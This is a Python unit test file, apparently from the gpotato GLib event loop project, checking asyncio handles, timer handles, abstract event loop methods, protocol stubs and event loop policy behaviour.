class GtkEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
unittest.TestCase):
def create_event_loop(self):
return gpotato.GLibEventLoop(gtk=True)
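# asyncio.Handle basics: callback/args storage, repr() before and after
# cancel(), and exception logging from _run().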
class HandleTests(LoopSetupMixin, unittest.TestCase):
def test_handle(self):
def callback(*args):
return args
args = ()
h = asyncio.Handle(callback, args, self.loop)
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h._cancelled)
r = repr(h)
self.assertTrue(r.startswith(
'<Handle '
'HandleTests.test_handle.<locals>.callback'))
self.assertTrue(r.endswith('>'))
h.cancel()
self.assertTrue(h._cancelled)
r = repr(h)
self.assertTrue(r.startswith('<Handle'))
self.assertTrue(r.endswith('cancelled>'), r)
def test_handle_assertion(self):
def callback(*args):
return args
h1 = asyncio.Handle(callback, (), self.loop)
self.assertRaises(
AssertionError, asyncio.Handle, h1, (), self.loop)
@unittest.expectedFailure
@unittest.mock.patch('asyncio.log.logger')
def test_callback_with_exception(self, log):
def callback():
raise ValueError()
h = asyncio.Handle(callback, (), self.loop)
h._run()
self.assertTrue(log.exception.called)
@unittest.skip("TimerHandle unused by gpotato")
class TimerTests(LoopSetupMixin, unittest.TestCase):
def test_hash(self):
when = time.monotonic()
h = asyncio.TimerHandle(when, lambda: False, (), self.loop)
self.assertEqual(hash(h), hash(when))
def test_timer(self):
def callback(*args):
return args
args = ()
when = time.monotonic()
h = asyncio.TimerHandle(when, callback, args, self.loop)
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h._cancelled)
r = repr(h)
self.assertTrue(r.endswith('>'))
h.cancel()
self.assertTrue(h._cancelled)
r = repr(h)
self.assertTrue(r.endswith(' cancelled>'), r)
self.assertRaises(AssertionError,
asyncio.TimerHandle, None, callback, args, self.loop)
def test_timer_comparison(self):
def callback(*args):
return args
when = time.monotonic()
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when, callback, (), self.loop)
# TODO: Use assertLess etc.
self.assertFalse(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertTrue(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertFalse(h2 > h1)
self.assertTrue(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertTrue(h1 == h2)
self.assertFalse(h1 != h2)
h2.cancel()
self.assertFalse(h1 == h2)
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when + 10.0, callback, (), self.loop)
self.assertTrue(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertFalse(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertTrue(h2 > h1)
self.assertFalse(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertFalse(h1 == h2)
self.assertTrue(h1 != h2)
h3 = asyncio.Handle(callback, (), self.loop)
self.assertIs(NotImplemented, h1.__eq__(h3))
self.assertIs(NotImplemented, h1.__ne__(h3))
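# Every method on the abstract AbstractEventLoop base class must raise
# NotImplementedError.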
class AbstractEventLoopTests(unittest.TestCase):
def test_not_implemented(self):
f = unittest.mock.Mock()
loop = asyncio.AbstractEventLoop()
self.assertRaises(
NotImplementedError, loop.run_forever)
self.assertRaises(
NotImplementedError, loop.run_until_complete, None)
self.assertRaises(
NotImplementedError, loop.stop)
self.assertRaises(
NotImplementedError, loop.is_running)
self.assertRaises(
NotImplementedError, loop.close)
self.assertRaises(
NotImplementedError, loop.call_later, None, None)
self.assertRaises(
NotImplementedError, loop.call_at, f, f)
self.assertRaises(
NotImplementedError, loop.call_soon, None)
self.assertRaises(
NotImplementedError, loop.time)
self.assertRaises(
NotImplementedError, loop.call_soon_threadsafe, None)
self.assertRaises(
NotImplementedError, loop.run_in_executor, f, f)
self.assertRaises(
NotImplementedError, loop.set_default_executor, f)
self.assertRaises(
NotImplementedError, loop.getaddrinfo, 'localhost', 8080)
self.assertRaises(
NotImplementedError, loop.getnameinfo, ('localhost', 8080))
self.assertRaises(
NotImplementedError, loop.create_connection, f)
self.assertRaises(
NotImplementedError, loop.create_server, f)
self.assertRaises(
NotImplementedError, loop.create_datagram_endpoint, f)
self.assertRaises(
NotImplementedError, loop.add_reader, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_reader, 1)
self.assertRaises(
NotImplementedError, loop.add_writer, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_writer, 1)
self.assertRaises(
NotImplementedError, loop.sock_recv, f, 10)
self.assertRaises(
NotImplementedError, loop.sock_sendall, f, 10)
self.assertRaises(
NotImplementedError, loop.sock_connect, f, f)
self.assertRaises(
NotImplementedError, loop.sock_accept, f)
self.assertRaises(
NotImplementedError, loop.add_signal_handler, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.connect_read_pipe, f,
unittest.mock.sentinel.pipe)
self.assertRaises(
NotImplementedError, loop.connect_write_pipe, f,
unittest.mock.sentinel.pipe)
self.assertRaises(
NotImplementedError, loop.subprocess_shell, f,
unittest.mock.sentinel)
self.assertRaises(
NotImplementedError, loop.subprocess_exec, f)
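# The base Protocol, DatagramProtocol and SubprocessProtocol callbacks are
# no-ops that return None.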
class ProtocolsAbsTests(unittest.TestCase):
def test_empty(self):
f = unittest.mock.Mock()
p = asyncio.Protocol()
self.assertIsNone(p.connection_made(f))
self.assertIsNone(p.connection_lost(f))
self.assertIsNone(p.data_received(f))
self.assertIsNone(p.eof_received())
dp = asyncio.DatagramProtocol()
self.assertIsNone(dp.connection_made(f))
self.assertIsNone(dp.connection_lost(f))
self.assertIsNone(dp.error_received(f))
self.assertIsNone(dp.datagram_received(f, f))
sp = asyncio.SubprocessProtocol()
self.assertIsNone(sp.connection_made(f))
self.assertIsNone(sp.connection_lost(f))
self.assertIsNone(sp.pipe_data_received(1, f))
self.assertIsNone(sp.pipe_connection_lost(1, f))
self.assertIsNone(sp.process_exited())
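# Event loop policy behaviour: the abstract policy raises NotImplementedError,
# while DefaultEventLoopPolicy creates, caches and swaps the per-thread loop,
# and the module-level get/set_event_loop_policy() manage the global policy.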
class PolicyTests(unittest.TestCase):
def test_event_loop_policy(self):
policy = asyncio.AbstractEventLoopPolicy()
self.assertRaises(NotImplementedError, policy.get_event_loop)
self.assertRaises(NotImplementedError, policy.set_event_loop, object())
self.assertRaises(NotImplementedError, policy.new_event_loop)
self.assertRaises(NotImplementedError, policy.get_child_watcher)
self.assertRaises(NotImplementedError, policy.set_child_watcher,
object())
def test_get_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
self.assertIsNone(policy._local._loop)
loop = policy.get_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
self.assertIs(policy._local._loop, loop)
self.assertIs(loop, policy.get_event_loop())
loop.close()
def test_get_event_loop_calls_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
with unittest.mock.patch.object(
policy, "set_event_loop",
wraps=policy.set_event_loop) as m_set_event_loop:
loop = policy.get_event_loop()
# policy._local._loop must be set through .set_event_loop()
# (the unix DefaultEventLoopPolicy needs this call to attach
# the child watcher correctly)
m_set_event_loop.assert_called_with(loop)
loop.close()
def test_get_event_loop_after_set_none(self):
policy = asyncio.DefaultEventLoopPolicy()
policy.set_event_loop(None)
self.assertRaises(RuntimeError, policy.get_event_loop)
@unittest.mock.patch('asyncio.events.threading.current_thread')
def test_get_event_loop_thread(self, m_current_thread):
def f():
policy = asyncio.DefaultEventLoopPolicy()
self.assertRaises(AssertionError, policy.get_event_loop)
th = threading.Thread(target=f)
th.start()
th.join()
def test_new_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
loop = policy.new_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
loop.close()
def test_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
old_loop = policy.get_event_loop()
self.assertRaises(AssertionError, policy.set_event_loop, object())
loop = policy.new_event_loop()
policy.set_event_loop(loop)
self.assertIs(loop, policy.get_event_loop())
self.assertIsNot(old_loop, policy.get_event_loop())
loop.close()
old_loop.close()
def test_get_event_loop_policy(self):
policy = asyncio.get_event_loop_policy()
self.assertIsInstance(policy, asyncio.AbstractEventLoopPolicy)
self.assertIs(policy, asyncio.get_event_loop_policy())
def test_set_event_loop_policy(self):
self.assertRaises(
AssertionError, asyncio.set_event_loop_policy, object())
old_policy = asyncio.get_event_loop_policy()
policy = asyncio.DefaultEventLoopPolicy()
asyncio.set_event_loop_policy(policy)
self.assertIs(policy, asyncio.get_event_loop_policy())
self.assertIsNot(policy, old_policy)
if __name__ == '__main__':
unittest.main()